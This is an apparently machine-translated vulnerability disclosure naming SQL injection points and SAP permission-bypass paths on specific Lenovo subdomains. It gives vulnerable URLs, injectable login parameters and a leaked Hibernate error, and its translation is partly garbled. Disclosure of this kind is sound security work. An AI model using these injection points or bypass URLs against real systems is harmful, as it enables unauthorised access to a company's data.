Several SQL injection and Permission Bypass vulnerabilities in Lenovo sub-station and repair

Http://www.lenovo-cw.com/cw.do? Actions = infoList & channel = 3 & columns = 2
Blind injection vulnerability ./
Proof of vulnerability:
 
 
Http://www.lenovo-cw.com/cw.do? Actions = infoList & channel = 4 & columns = 1
 
Expecting ''', found ''[select a from com. lenovo. cw. entity. infoIssue a where 1 = 1 and. channel = 4 and. columns = 1' and. state = 1 order by. createTime desc]; nested exception is org. hibernate. queryException: expecting ''', found ''[select a from com. lenovo. cw. entity. infoIssue a where 1 = 1 and. channel = 4 and. columns = 1' and. state = 1 order by. createTime desc]
Solution:
Reference: OWASP 09/13/2009
Https://www.owasp.org/index.php/Blind_ SQL _Injection


2.

The e-learning substation login module has the POST injection vulnerability.
Vulnerability address: http://e-learning.lenovo.com.cn/user/login
Vulnerability method: POST
Data Type: String
Database: Lenovo
Trigger parameter www.2cto.com
UserLogin [password] = WCRTESTINPUT000001 & UserLogin [verifyCode] = WCRTESTINPUT000002 & UserLogin [rememberMe] = 0 & yt1 = login & UserLogin [username] = 11111111
Proof of vulnerability:
 
 

 




Solution:
See owasp SQL Injection 12/6/2011 version
Https://www.owasp.org/index.php/ SQL _Injection

3.

Brief description:
SAP J2EE Engine Permission Bypass, Directory Traversal
Detailed description:
Web applications traverse directories through SAP, bypass account logon restrictions, and access internal information systems.
Proof of vulnerability:
Http://ec1.lenovo.com.cn/home/eppcsr/ecall/jsp/customer/upload/upload.jsp
Http://ec1.lenovo.com.cn/home/eppcsr/ecall/jsp/customer/
Http://ec1.lenovo.com.cn/wsnavigator/jsps/
Solution:
Contact a third-party application vendor
 
Author Bincker